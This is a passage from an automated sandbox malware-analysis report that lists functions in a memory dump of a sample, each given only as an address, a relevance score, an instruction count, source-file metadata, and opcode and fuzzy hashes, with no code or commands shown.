                                                                                            • Opcode ID: c87b4f118c440b1e0eb679ea165fdbd9ab4ca8ba78feeda1c731d4dd63cbab4f
                                                                                            • Instruction ID: 5ee105a31e3334c0a0d5b73b908a9e59006c53ef5c62a397493621c9d236e71f
                                                                                            • Opcode Fuzzy Hash: c87b4f118c440b1e0eb679ea165fdbd9ab4ca8ba78feeda1c731d4dd63cbab4f
                                                                                            • Instruction Fuzzy Hash: FFA11C71B1890D8FDBA8FA6CD494B6877E1FFA8314F1541B9D11DCB2A1DA25AC42CB40
                                                                                            Function 00007FFB4B2940CC Relevance: .3, Instructions: 333COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5b0776f0996547f8a7a252a1dff14a9c1e9573d840894a4f2c2dd8a464387665
                                                                                            • Instruction ID: b56b53b0ece41083d6442525f7f922692e91ccd8641263ef1d23107b3ef9815e
                                                                                            • Opcode Fuzzy Hash: 5b0776f0996547f8a7a252a1dff14a9c1e9573d840894a4f2c2dd8a464387665
                                                                                            • Instruction Fuzzy Hash: AEA11C71B1890D8FDBA8FE6CD494B6877E1FF98314F1541B9D11DCB2A1DA25AC42CB40
                                                                                            Function 00007FFB4B29411C Relevance: .3, Instructions: 329COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9545fd6a489d85e594dc78bf2e0c9b63d6252db3aeb7c6a37fdb0092ef2d4ee1
                                                                                            • Instruction ID: a68767b35658769b4b0f945c7f093a2aacf43f64c4f137fa5fb46175e704d29a
                                                                                            • Opcode Fuzzy Hash: 9545fd6a489d85e594dc78bf2e0c9b63d6252db3aeb7c6a37fdb0092ef2d4ee1
                                                                                            • Instruction Fuzzy Hash: 6FA10C71B1890D8FDBA8FA6CC494B6877E1FF98315B1541A9D11ECB2A1DA25EC42CB40
                                                                                            Function 00007FFB4B293FC8 Relevance: .3, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 272cce16adf1963a027f2802251f793930e94ab2bf64abe60a8cd4c098373d66
                                                                                            • Instruction ID: 24065e696f8311be9c1b64bbf14bc4c479e4408ae008f05ead3afbcbc7eff3c4
                                                                                            • Opcode Fuzzy Hash: 272cce16adf1963a027f2802251f793930e94ab2bf64abe60a8cd4c098373d66
                                                                                            • Instruction Fuzzy Hash: 09A10C71B1890D8FDBA8FB6CC454A6877E2FF98315F1541B9D11ECB2A1DA25AC42CB40
                                                                                            Function 00007FFB4B2940FF Relevance: .3, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9637d80676cb153f6d7fee14bf71192be92ad3d7ffe3b6ca246c0709d3fb7237
                                                                                            • Instruction ID: 24065e696f8311be9c1b64bbf14bc4c479e4408ae008f05ead3afbcbc7eff3c4
                                                                                            • Opcode Fuzzy Hash: 9637d80676cb153f6d7fee14bf71192be92ad3d7ffe3b6ca246c0709d3fb7237
                                                                                            • Instruction Fuzzy Hash: 09A10C71B1890D8FDBA8FB6CC454A6877E2FF98315F1541B9D11ECB2A1DA25AC42CB40
                                                                                            Function 00007FFB4B2930FF Relevance: .2, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e3d6b8f428141a563131987cfab7fb61995c7ecf45470ed85d9c0dfe5c24691
                                                                                            • Instruction ID: fe2ebed6e929c74f80b33fbf73f231b9308a2587506a4953e2c7c408e0ce53a3
                                                                                            • Opcode Fuzzy Hash: 5e3d6b8f428141a563131987cfab7fb61995c7ecf45470ed85d9c0dfe5c24691
                                                                                            • Instruction Fuzzy Hash: 6E5104B1A0D68D8FE756FF78C8566E97FE0EF56360F0440BED04ECB2A2DA2858458740
                                                                                            Function 00007FFB4B29388B Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0dd46ac6e904b5208841702b4a52fd2e2e60dc61d69fe4d3daad35caa1e372c
                                                                                            • Instruction ID: 1fe94eac5e3d7d301878fd09f083ae9ee881c8fb92fec09c1b1e1bf0281ad0b4
                                                                                            • Opcode Fuzzy Hash: d0dd46ac6e904b5208841702b4a52fd2e2e60dc61d69fe4d3daad35caa1e372c
                                                                                            • Instruction Fuzzy Hash: E04114B1A0DA4D4FE769BFB8C0562B97BE0EF55310B1454BEC58FC71A3DD1858528740
                                                                                            Function 00007FFB4B293ADC Relevance: .1, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ac0f95d650e3c8cdb94808ef1c59c317020e6be8849af3c5bd73931ad2d1dc3
                                                                                            • Instruction ID: 32ba953b37a2a9645ebe7a1bc7491769e7b2cdbc16798f90c8470bd39088bc3b
                                                                                            • Opcode Fuzzy Hash: 7ac0f95d650e3c8cdb94808ef1c59c317020e6be8849af3c5bd73931ad2d1dc3
                                                                                            • Instruction Fuzzy Hash: 3F312171B18A4D8FDF98EF6CC454A69B7F2FF58300B048169900DDB2A6DA25EC41CB40
                                                                                            Function 00007FFB4B291438 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8f31fc50c471f85a0777c6eec4325b894753e2a8bdde2b3e6642333781860e3d
                                                                                            • Instruction ID: 79ba69e53d0d65fa648c208cdb07cbb40d811d0cb0af61e76107ceaba77a8a58
                                                                                            • Opcode Fuzzy Hash: 8f31fc50c471f85a0777c6eec4325b894753e2a8bdde2b3e6642333781860e3d
                                                                                            • Instruction Fuzzy Hash: DA117D3161CA094FE35ABA3CDD446753AC5EB4D710F54807AD10DC72E6EE1CAD448340
                                                                                            Function 00007FFB4B29A1E2 Relevance: .1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61a24f4dd1c1ea39dc534bfb796abdc1b626201cb34b97a0208789b39bb170f9
                                                                                            • Instruction ID: 9841e526cfa7a1c87eecf087484dddb9475635be888ab82d0a4471de0dc4bae2
                                                                                            • Opcode Fuzzy Hash: 61a24f4dd1c1ea39dc534bfb796abdc1b626201cb34b97a0208789b39bb170f9
                                                                                            • Instruction Fuzzy Hash: 0311ACB5B1C90E8BEB94FE28C9506B52BE1FF54350B508179C51ED72E6EE28EC129780
                                                                                            Function 00007FFB4B29449F Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c1ab17aabe7a1291d9062591633ca980a314ecb67f8707202dda4475fcd1739
                                                                                            • Instruction ID: 7ad720473ce564bd47a74c886c3e4966cebdd5c80b607ee6de03d8dd6c819656
                                                                                            • Opcode Fuzzy Hash: 6c1ab17aabe7a1291d9062591633ca980a314ecb67f8707202dda4475fcd1739
                                                                                            • Instruction Fuzzy Hash: D301F7B254D60C1EF72CBE59FC076F977A8EB86130F00113FE18E82012E51639638355
                                                                                            Function 00007FFB4B2919BD Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dca61d426c5e6e7469aa0c39e695441a82be1d3dd35b7cf8b886e8df00a04d20
                                                                                            • Instruction ID: de022bc91d5a6a790c018917538cf1183f937fe53a1595c00f9b8c0b99a472cf
                                                                                            • Opcode Fuzzy Hash: dca61d426c5e6e7469aa0c39e695441a82be1d3dd35b7cf8b886e8df00a04d20
                                                                                            • Instruction Fuzzy Hash: 7D012B63A0C81E0BF278BD6CE8446B6A7C5E789370F1542BAD50EC31D1ED085D4341C4
                                                                                            Function 00007FFB4B2917FA Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ae77a18d9e85472b0c9a65c0420edb1265f8e776ab9541f1af7697231866685
                                                                                            • Instruction ID: 1a4b26a5ab8d8cfbce91f46fe09d8dcb9460eafcd13a73379f85f762356d2153
                                                                                            • Opcode Fuzzy Hash: 3ae77a18d9e85472b0c9a65c0420edb1265f8e776ab9541f1af7697231866685
                                                                                            • Instruction Fuzzy Hash: 2F11E4B0A0C24EAFE700BF65C815ABE7BB1FF42301F0049BAC509E72A1DB786555CB80
                                                                                            Function 00007FFB4B2944E3 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1059daad825843dafdb511d5c2ee0723d212ef1aa310a9c2d1088294106ac3a7
                                                                                            • Instruction ID: 6770d7b0be89109eaf3e1a41869d323f3327d937088eddc6e4ca4771010538aa
                                                                                            • Opcode Fuzzy Hash: 1059daad825843dafdb511d5c2ee0723d212ef1aa310a9c2d1088294106ac3a7
                                                                                            • Instruction Fuzzy Hash: 1C0144A114E3C82EE71A7B25AD178F67F68DA83250B0512DFE4C9CA063E0456F378372
                                                                                            Function 00007FFB4B29B850 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3fdeaa03cbbc452cbc9678e138d45d88dd13bf0a15825f31d1dd74ecd698da52
                                                                                            • Instruction ID: a4b9425ca75c554063602459e91edd3483fd7b8015b6620c688698cf0be59492
                                                                                            • Opcode Fuzzy Hash: 3fdeaa03cbbc452cbc9678e138d45d88dd13bf0a15825f31d1dd74ecd698da52
                                                                                            • Instruction Fuzzy Hash: 9D11A760F1C51D8BEB65BE34C5102B82AF1EF58351F1081B5C61EE32E5CE2CAD029780
                                                                                            Function 00007FFB4B297CCD Relevance: .1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 010c84ea36647d2fc72d9f43268c26c937d1a75553dc345becbfe1cebba40db9
                                                                                            • Instruction ID: 30a57fc4c5dd3045af649a8d5c529bad4ac9a0d496fa89256fa176ec9b93634d
                                                                                            • Opcode Fuzzy Hash: 010c84ea36647d2fc72d9f43268c26c937d1a75553dc345becbfe1cebba40db9
                                                                                            • Instruction Fuzzy Hash: 83015E60E1C81F5BE755BB34C9152FD2AE1EF05310F4482B9CA0EE72E6DD2C6A428781
                                                                                            Function 00007FFB4B2973BD Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b33e59787e954fc41a6fa2b2a5961005fdbd19b593decf9e049749fc4bdfb88e
                                                                                            • Instruction ID: f324de1a3c2d35bf87c989cd024e6ae6d8fa109c3ccddd2cef5a1e688a862c85
                                                                                            • Opcode Fuzzy Hash: b33e59787e954fc41a6fa2b2a5961005fdbd19b593decf9e049749fc4bdfb88e
                                                                                            • Instruction Fuzzy Hash: 6411A1A1F2C41E5BE756BB34C9192B93AA1BF10310F5482B5CA0EE71F6DE2C6D01D781
                                                                                            Function 00007FFB4B29867C Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2035937168372ff0554fbec7da0c933c6c2fc9586a7f446ecb740e1a7fce9e24
                                                                                            • Instruction ID: a1f2afc6a37c5a522e1f757142e2b72416429d25b3d9af1fc1a872966199aefc
                                                                                            • Opcode Fuzzy Hash: 2035937168372ff0554fbec7da0c933c6c2fc9586a7f446ecb740e1a7fce9e24
                                                                                            • Instruction Fuzzy Hash: 9501D6B5F0C54E8BEB54FE24C5406B57BE1AF54340F148075C65ED32E5D928BD02D781
                                                                                            Function 00007FFB4B29AF08 Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c07bb0bf4d0ec69fb1ec4084cb6f9b0ccbab8da8d619c66177ad45820fb3930
                                                                                            • Instruction ID: 66532fbcc0e718440c902c96033f6f483e78e6bd8b8b6054be4e4e8411be8d20
                                                                                            • Opcode Fuzzy Hash: 2c07bb0bf4d0ec69fb1ec4084cb6f9b0ccbab8da8d619c66177ad45820fb3930
                                                                                            • Instruction Fuzzy Hash: 11017160B1C85E8FE755FB28C864AA97BE1FF15310F0481F9C54ED72A5DD28AD01CB80
                                                                                            Function 00007FFB4B29735A Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ec4daf3bb7fb1b99b9bebea30a6e75a1caae7de4e8b8ecb65f6c54c23072ce9
                                                                                            • Instruction ID: 4859af37a0b12d0bcffed91dcc46af4926a355b71af993aa35e6f653a7146a9a
                                                                                            • Opcode Fuzzy Hash: 7ec4daf3bb7fb1b99b9bebea30a6e75a1caae7de4e8b8ecb65f6c54c23072ce9
                                                                                            • Instruction Fuzzy Hash: 39019E71F1C41E4BEB54BE24C5003B927F0AF14310F1482B4CA4EA72E6CE2CAE01CB81
                                                                                            Function 00007FFB4B29A7F9 Relevance: .0, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fba3e46ddf510cd7d805cbb11b2e25c349e80667cdd7c06732d88a8ed3240068
                                                                                            • Instruction ID: 110b4deaa9db32030544e7f74df86f56efc27508ed6a833b2b74dee568e3b3a8
                                                                                            • Opcode Fuzzy Hash: fba3e46ddf510cd7d805cbb11b2e25c349e80667cdd7c06732d88a8ed3240068
                                                                                            • Instruction Fuzzy Hash: AF018B64F1C41E4BEB64FE24C5103B92AE1BF54310F0081B4CA4EA72E6CE2CAE01DB81
                                                                                            Function 00007FFB4B29B330 Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f212df5d44751bad676d060bc408367bc2e2eaae65560767a3de703fb0526f15
                                                                                            • Instruction ID: f85943327d1aec60a433d93f82af1dbf06550ec4f45cdb8d5a52fb8b466c094f
                                                                                            • Opcode Fuzzy Hash: f212df5d44751bad676d060bc408367bc2e2eaae65560767a3de703fb0526f15
                                                                                            • Instruction Fuzzy Hash: 4FF01970A1C81E9FEB95FB28C4546A837E1EF14300F1041B9D51EE32A2EE28AD418B50
                                                                                            Function 00007FFB4B298B55 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4c750e0e534a212b8b35c072981f29bc44a5a9b14c055108b2839a06e8d705f9
                                                                                            • Instruction ID: aa898d1407210d27f4646bc349592fbf00969baeadbe7fb6ede211699d035391
                                                                                            • Opcode Fuzzy Hash: 4c750e0e534a212b8b35c072981f29bc44a5a9b14c055108b2839a06e8d705f9
                                                                                            • Instruction Fuzzy Hash: 88F031B1B1C91E4FDBD4FE28C5946B966A2FF58301F1441B9950DD71A6DE24AC418B40
                                                                                            Function 00007FFB4B297CFE Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: deea970944c1c2c03c9b1200c43bc75cdc5b93b06fc46091060cdf28f5ad7c79
                                                                                            • Instruction ID: 2f7634e2218c0a0903f6200e1ba785fa5e79c3d8d4fc4ec05af14b173940d2c4
                                                                                            • Opcode Fuzzy Hash: deea970944c1c2c03c9b1200c43bc75cdc5b93b06fc46091060cdf28f5ad7c79
                                                                                            • Instruction Fuzzy Hash: 9CF01D61F1C81E5BE759FF28C5543B826E1EF58351F0181B5C60EE32E6EE28AD518780
                                                                                            Function 00007FFB4B291148 Relevance: .0, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a453404cc1438812f93b23b9a61057231ee911ecfdcdc6b2f6bcd48ee1941f7d
                                                                                            • Instruction ID: 984c7d981017496ecb569ef39bf7a38aa745f2ab8e3a5d84cb991222a02853c4
                                                                                            • Opcode Fuzzy Hash: a453404cc1438812f93b23b9a61057231ee911ecfdcdc6b2f6bcd48ee1941f7d
                                                                                            • Instruction Fuzzy Hash: 59F08C30B1882E4BC798FA2DE0847A562D2EB88216B2440B9900DD72A8DD25DC82C380
                                                                                            Function 00007FFB4B29525F Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2fb35d2367f467feff4ff172b05b57f52f6f4ca9e5d7fddb8d3fa01c747555e6
                                                                                            • Instruction ID: 8d6e0efebb56e0c11eed884fa2a1e39f6e281851209fe6ca7a6a01dd18f4c47c
                                                                                            • Opcode Fuzzy Hash: 2fb35d2367f467feff4ff172b05b57f52f6f4ca9e5d7fddb8d3fa01c747555e6
                                                                                            • Instruction Fuzzy Hash: C7F096B1B4D50E8FD700EAA8C8045ED7BF0FF91321B144676C014D31A1EB7858418B80
                                                                                            Function 00007FFB4B2956FC Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3fa868da43a5cfb27b681ca3765def7db894723b0364f6fd949973d87c5543a9
                                                                                            • Instruction ID: 9c9abe9ccd12123aea576428baf2849f61720329458163e20c08a0fdfd8abaf5
                                                                                            • Opcode Fuzzy Hash: 3fa868da43a5cfb27b681ca3765def7db894723b0364f6fd949973d87c5543a9
                                                                                            • Instruction Fuzzy Hash: 47F08271B0D35E8FE715AE38D0005653BE1FB49310B61C2BAD04EC72EBCA289C428780
                                                                                            Function 00007FFB4B297EF3 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbc9e89ae986610ba64036e02690d4a7e0936e98efa5d07310a26a347669df25
                                                                                            • Instruction ID: 2442cbd8b60c8cc58de0fcdd279a5fa69d34306aaeb0b8ad9663d1566829a2bf
                                                                                            • Opcode Fuzzy Hash: fbc9e89ae986610ba64036e02690d4a7e0936e98efa5d07310a26a347669df25
                                                                                            • Instruction Fuzzy Hash: B8F05E65F1C81E4BEB59FE24C5502B937E1AF54310F1081B5C65EE72E6DE28BE12CB81
                                                                                            Function 00007FFB4B295491 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3059895521.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffb4b290000_Wh2c6sgwRo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 00fa638cbfed09424396e9e9703c48435dd13b8530715f1120f048745c015e62
                                                                                            • Instruction ID: 2a5f456ec829e18e7dc9d9f902f0fb08a32480dfb7d6a5653594f1c1b8efead1
                                                                                            • Opcode Fuzzy Hash: 00fa638cbfed09424396e9e9703c48435dd13b8530715f1120f048745c015e62
                                                                                            • Instruction Fuzzy Hash: 4AE09B7270DA4E4FE7A1FE34C4011BA3BA2EB95311B1593BAC00ED71A5DD6C65078740
                                                                                            Function 00007FFB4B2973E4 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
